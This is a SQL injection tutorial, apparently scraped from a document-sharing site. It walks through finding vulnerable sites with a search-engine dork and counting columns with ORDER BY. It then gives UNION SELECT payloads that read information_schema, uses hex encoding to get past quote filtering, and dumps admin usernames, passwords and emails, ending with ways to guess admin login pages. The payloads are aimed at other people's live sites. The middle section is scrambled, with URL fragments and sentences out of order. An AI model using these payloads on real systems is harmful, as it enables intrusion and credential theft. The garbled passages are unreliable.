This action might not be possible to undo. Are you sure you want to continue?
SECTION 1 - Searching for the vulnerability inurl:buy.php?id= This will be inputted into a search engine and because of the "inurl:" part of the dork, the search engine will return results with URLs that contain the same characters. Some of the sites that have this dork on their website may be vulnerable to SQL injection. Now let's say we found the page that looks like this http://www.site.com/buy.php?id=1 In order to test this site all we need to do is add a ' either in between the "=" sign and the "1" or after the "1" so it looks like this: http://www.site.com/buy.php?id=1' or http://www.site.com/buy.php?id='1 After pressing enter, if this website should return an error such as the following:
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home1/michafj0/public_html/gallery.php on line 7
Or something along those lines, this means it's vulnerable to injection. In some cases where you are to find a website such as this: http://www.site.com/buy.php?id=1&dog;catid=2 Then you must use the same technique with adding a ' except it must be between the value (in this case the number) and the operator (the "=" sign) so it looks like this: http://www.site.com/buy.php?id='1&dog;catid='2 There are programs that will do this for you but to start off I would suggest simply to do things manually, using Google, and so I won't post any for you guys. If you feel so compelled to use one anyways. I recommend the Exploit Scanner by Reiluke.
php?id=-1 CaN I HaZ TeH PaSSwOrDs? PLz aNd ThX IT DOESN'T MATTER (btw please don't think that was an actual command). http://www.<---ERROR! This means that there are FOUR columns! DON'T FORGET TO INCLUDE THE DOUBLE NULL (--) AFTER THE QUERY.php?id=1 ORDER BY 4-. To find the number of columns we write a query with incrementing values until we get an error. There is also one other difference that is small in size but not in importance.site.com/buy.php?id=1 ORDER BY 1-.com/buy.SECTION 2 .com/buy. Those are the numbers of the columns that are vulnerable to injection.php?id=1 ORDER BY 3-.4-If you couldn't spot the difference. it's the extra null in between the "=" sign and the value (the number). like this: http://www.site.site. We can use those columns to pull information from the database which we will see in Part Two.site. VERY IMPORTANT! SECTION 3 .<---No error http://www. for all it cares your queries could look like this: http://www. To do this we use the UNION and SELECT queries while keeping the double null (--) at the end of the string. So to find the number of columns we must use a very complex and advanced method that I like to call "Trial and Error" with the ORDER BY command NOTE: SQL does not care whether or not your letters are capitalized or not and I'm just doing it out of clarity. buy.<---No error http://www.com/buy.php?id=-1 UNION SELECT 1.php?id=1 ORDER BY 5-.<---No error http://www.<---No error http://www.Finding which columns are vulnerable So we know that there are four columns now we have to find out which ones are vulnerable to injection.3.site.php?id=1 ORDER BY 2-. So back to the ORDER BY command.com/buy.site.Determining the amount of columns In order for us to be able to use commands and get results we must know how many columns there are on a website. see if you can spot it.php?id=-1 Now after entering that query you should be able to see some numbers somewhere on the page that seem out of place.com/buy. .2.site.com/buy.
3.Part Two .47-community-log which is the version of SQL for the website.4- NOTE: If this method must be used here.Gathering Information In this part we will discover how to find the name of the database and what version of SQL the website is using by using queries to exploit the site.@@version. Using that information we can put together our next query (I will be using column 2).site.php?id=-1 UNION SELECT 1. In this tutorial. If the website still does not display the version try using unhex(hex()) which looks like this: http://www. this is where we will place "@@version".3. Finding the version of the SQL of the website is a very important step because the steps you take for version 4 are quite different from version 5 in order to get what you want. NOTE: If you see version 4 and you would like to have a go at it.com/buy.site.unhex(hex(@@version)). To find the database we use a query like the one below: http://www.com/buy.3.group_concat(schema_name). Determining the SQL version. Another string that could replace "@@version" is "version()".4 from information_schema.1.site.php?id=-1 UNION SELECT 1. there are other tutorials that explain how to inject into it. it must be used for the rest of the injection as well.php?id=-1 UNION SELECT 1.schemata-This could sometimes return more results than necessary and so that is when we switch over . it's not worth your time. The command should look like this: http://www.4-Because 2 is the vulnerable column. If we look back to the end of Section Three in Part One we saw how to find the vulnerable columns. Finding the database Finding the name of the database is not always a necessary step to take to gather the information that you want. however in my experience folllowing these steps and finding the database may sometimes lead to a higher success rate. I will not be covering version 4 because it really is a guessing game and for the kind of sites that are still using it.com/buy. Now what you want to see is something along these lines: 5.
http://www.3.tables WHERE table_schema=database() LIMIT 0. Admin(s).1-Notice how my limit was 30.tables WHERE table_schema=database() LIMIT 30.to this query instead: http://www.1 which means that the 30th is actually the 31st You now have all the table names! Finding the column names Now that you have all of the table names try and pick out the one that you think would contain the juicy information.site. it really isn't so I'll try to explain. tblUser(s) and so on but it varies between sites.1 instead of 31.4 FROM information_schema.table_name.site.table_name.1? This is because when using limit is starts from 0.site. What this query does is it "groups" (group_concat) the "table names" (table_name) together and gathers that information "from" (FROM) information_schema.com/buy.3.concat(database()).4 FROM information_schema. The Good Stuff This is the fun part where we will find the usernames.group_concat(table_name).php?id=-1 UNION SELECT 1. . emails and passwords! Finding the table names To find the table names we use a query that is similar to the one used for finding the database with a little bit extra added on: http://www.1-What this does is it shows the first and only the first table. So if we were to run out of characters on let's say the 31st table we could use this query: http://www.3.tables where the "table schema" (table_schema) can be found in the "database" (database()).3.php?id=-1 UNION SELECT 1.com/buy.4-Welldone hacker! You now have the name of the database! Copy and paste the name somewhere safe.php?id=-1 UNION SELECT 1.site.4 FROM information_schema.tables WHERE table_schema=database()-It may look long and confusing but once you understand it.php?id=-1 UNION SELECT 1.com/buy. Usually they're tables like User(s).com/buy. NOTE: While using group_concat you will only be able to see 1024 characters worth of tables so if you notice that a table is cut off on the end switch over to limit which I will explain now. we'll need it for later.
site.4 FROM information_schema. and email.3. 4.0x3a.com/buy.php?id=-1 UNION SELECT 1. Copy the name of the table that you are trying to access.email).php 3. 2. Paste the name of the table into this website where it says "Say Hello To My Little Friend".After deciding which table you think contains the information. and my database name will be "db123").password.com/buy.com/buy. This can be bypassed by using a hex or char converter (they both work) to convert the normal text into char or hex (a link to a website that does this will be included at the end of the tutorial).4 FROM information_schema.Admin-- .site. Displaying the column contents We're almost done! All we have left to do is to see what's inside those columns and use the information to login! To view the columns we need to decide which ones we want to see and then use this query (in this example I want to view the columns "username". NOTE: Using the limit function does work with columns as well.group_concat(column_name). I'll be using the table name "Admin"): http://www.0x3a. and "email". "password".columns WHERE table_name=0x41646d696e-Notice how before I pasted the hex I added a "0x". password. Copy the string of numbers/letters under Hex into your query so it looks like this: http://www.3.4 FROM db123.swingnote.columns WHERE table_name="Admin"-This will either give you a list of all the columns within the table or give you an error but don't panic if it is outcome #2! All this means is that Magic Quotes is turned on.group_concat(username. use this query (in my example.group_concat(column_name). Hex/Char Converter Spoiler (Click to View) http://www.com/tools/texttohex.3. You should now see a list of all the columns within the table such as username. Click convert. This is where the database name comes in handy: http://www.php?id=-1 UNION SELECT 1.php?id=-1 UNION SELECT 1.site. UPDATE: If you get an error at this point all you must do is follow these steps: 1. all this does is tells the server that the following characters are part of a hex string.
including the admin.site.site. here are some examples: http://www.com/adminlogin http://www. it might save you a couple of clicks. All you have to do now is find the admin login page which brings us to the last section Finding the admin page Usually the admin page will be directly off of the site's home page. FINALLY! Now you have the login information for the users of the site.com/moderator Once again there are programs that will find the page for you but first try some of the basic guesses. 0x3a is the hex value of a colon (:) which will group the username:password:email for the individual users just like that. . If you do use a program Reiluke has coded one for that as well.In this query.com/modlogin http://www.site.site. Search Admin Finder by Reiluke.com/admin http://www.
This action might not be possible to undo. Are you sure you want to continue?
We've moved you to where you read on your other device.
Get the full title to continue listening from where you left off, or restart the preview.